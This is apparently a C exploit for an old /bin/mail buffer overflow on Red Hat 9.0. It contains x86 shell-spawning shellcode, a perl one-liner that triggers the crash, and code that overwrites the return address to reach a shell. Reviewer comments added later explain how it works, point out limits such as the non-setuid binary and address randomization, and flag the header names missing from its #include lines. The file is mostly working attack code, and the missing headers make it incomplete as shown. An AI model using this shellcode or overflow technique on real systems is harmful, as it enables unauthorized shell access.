/* redhat 9.0 and some others linux have this vul.
 * sorry for my poor english.
 * /bin/mail -s test -c `perl -e print "A"x9000'` root@localhost,you can see something wrong.
 * I write this exploit just for fun ,because "mail" have not suid.
 * code by OYXin (www.ph4nt0m.net)
 */

/* NOTE(review): the header names were lost in this copy of the file; as
 * shown, these three directives are incomplete and will not preprocess. */
#include
#include
#include

/* Length of the 0x41 filler in the oversized "-c" argument.  `buf` below is
 * BUFSIZE+16 bytes, so the filler occupies buf[0..BUFSIZE-1] and the three
 * copies of `ret` are written immediately after it. */
#define BUFSIZE 8216

/*shellcode form s0t4ipv6@shellcode.com.ar*/
/* Raw x86 payload bytes.  They are handed to the child through its
 * environment (see `env` in main), not through the oversized argument.  The
 * byte sequence contains the strings "/bin" and "//sh", i.e. this is a
 * shell-spawning payload. */
char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x89"
    "\x64\x24\x0c\x89\x44\x24\x10\x8d"
    "\x4c\x24\x0c\x8b\x54\x24\x08\xb0"
    "\x0b\xcd\x80";

/* Entry point: builds an ~8 KB "-c" argument and replaces this process with
 * /bin/mail, passing that argument and a payload-carrying environment.
 *
 * Defensive reading: the trigger is simply an over-long -c argument to
 * /bin/mail (the header comment reproduces it with a perl one-liner).  The
 * author notes that mail is not setuid, so any shell obtained runs only with
 * the invoking user's own privileges.  The hard-coded address arithmetic
 * below presumes a predictable, non-randomized stack layout; address-space
 * randomization would defeat it.  Returns 0 (only reached if execve fails). */
int main(void)
{
    /* BUFSIZE bytes of filler + 12 bytes of return address + NUL + 3 spare. */
    char buf[BUFSIZE+16];

    /* argv for the child: buf becomes the value of the "-c" option. */
    char *prog[] = {"/bin/mail","-s","TEST","-c",buf,"root@localhost", NULL};

    /* envp for the child: the payload string itself is an environment entry. */
    char *env[] = {"HOME=OYXin", shellcode, NULL};

    /* Guessed address at which the payload is expected to sit in the child:
     * 0xc0000000 (presumably the classic 32-bit Linux top-of-stack) minus a
     * pointer, the program name and the payload length, minus 2.
     * NOTE(review): only meaningful on a 32-bit layout; see memcpy size below. */
    unsigned long ret = 0xc0000000 - sizeof(void *) - strlen(prog[0]) - strlen(shellcode) - 0x02;

    /* Fill the entire buffer, tail included, with 0x41 ('A'). */
    memset(buf,0x41,sizeof(buf));

    /* Overwrite the 12 bytes just past the filler with three copies of `ret`,
     * taken from its in-memory representation (host byte order).  The hard
     * coded 4 assumes sizeof(unsigned long) == 4; on an LP64 host only the
     * low half of `ret` is copied. */
    memcpy(buf+BUFSIZE,(char *)&ret,4);
    memcpy(buf+BUFSIZE+4,(char *)&ret,4);
    memcpy(buf+BUFSIZE+8,(char *)&ret,4);

    /* NUL-terminate so the argument ends here; the last 3 bytes of buf are
     * never seen by the child. */
    buf[BUFSIZE+12] = 0x00;

    /* On success this never returns.  The return value is not checked, so a
     * failed execve (e.g. /bin/mail missing) silently falls through to
     * "return 0". */
    execve(prog[0],prog,env);
    return 0;
}

/* you must enter "." and a return to get a shell.
 * (presumably because mail reads the message body from stdin and a lone "."
 * line terminates it — the page does not show this itself) */